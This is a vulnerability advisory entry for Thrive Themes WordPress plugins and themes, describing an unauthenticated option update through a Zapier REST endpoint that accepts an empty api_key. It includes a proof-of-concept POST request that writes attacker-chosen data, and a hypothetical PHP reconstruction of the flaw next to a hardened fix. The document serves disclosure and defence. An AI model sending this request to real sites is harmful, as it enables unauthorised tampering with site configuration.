WordPress Plugin Vulnerabilities
All Thrive Themes and Plugins - Unauthenticated Option Update
Description
The plugins and themes register a REST API endpoint associated with their Zapier functionality. Although this endpoint was intended to require an API key, vulnerable versions could be accessed by supplying an empty api_key parameter when Zapier was not enabled. Attackers could use this endpoint to add arbitrary data to a predefined option in the wp_options table.
Proof of Concept
POST /wp-json/td/v1/optin/subscription HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

hook_url={"http:\/\/key":"maliciousfile.php"}&api_key=
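As an added illustration that is not Thrive's code, the hypothetical permission callback below reproduces the failure mode the description names (an empty api_key matching an empty stored key while the integration is off) beside a fail-closed version; the option names, route handler and hook_url check are assumed placeholders.

```php
<?php
// Hypothetical reconstruction, not the vendor's code. Option names are assumed.

// Weak check: when the integration is disabled no key is configured, so the
// stored option is '' and an empty api_key parameter compares equal to it.
function weak_permission_callback( WP_REST_Request $request ) {
    $stored = get_option( 'example_zapier_api_key', '' ); // '' when Zapier is off
    return $request->get_param( 'api_key' ) === $stored;   // '' === '' is true
}

// Hardened check: fail closed when the feature is off or no key is configured,
// require a non-empty string on both sides, and compare in constant time.
function hardened_permission_callback( WP_REST_Request $request ) {
    $forbidden = new WP_Error( 'rest_forbidden', 'Forbidden', array( 'status' => 403 ) );
    if ( ! get_option( 'example_zapier_enabled', false ) ) {
        return $forbidden; // integration disabled: nothing should be reachable
    }
    $stored = get_option( 'example_zapier_api_key', '' );
    $given  = $request->get_param( 'api_key' );
    if ( ! is_string( $stored ) || $stored === '' || ! is_string( $given ) || $given === '' ) {
        return $forbidden; // never accept a missing or empty key
    }
    if ( ! hash_equals( $stored, $given ) ) {
        return $forbidden; // constant-time comparison of the configured key
    }
    return true;
}

// Assumed handler: validate the value before it is persisted into wp_options,
// so arbitrary data cannot be written even by an authenticated caller.
function example_subscription_handler( WP_REST_Request $request ) {
    $hook_url = $request->get_param( 'hook_url' );
    if ( ! is_string( $hook_url ) || false === wp_http_validate_url( $hook_url ) ) {
        return new WP_Error( 'rest_invalid_param', 'hook_url must be a valid URL', array( 'status' => 400 ) );
    }
    update_option( 'example_zapier_hook_url', esc_url_raw( $hook_url ) );
    return rest_ensure_response( array( 'status' => 'ok' ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'td/v1', '/optin/subscription', array(
        'methods'             => 'POST',
        'callback'            => 'example_subscription_handler',
        'permission_callback' => 'hardened_permission_callback',
    ) );
} );
```

With the hardened callback in place, the request shown in the proof of concept receives a 403 whether or not the integration is enabled, because an empty api_key is rejected before any comparison.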
Affects Plugins
Affects Themes
References
CVE
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-24
Added
2021-03-24
Last Updated
2021-03-30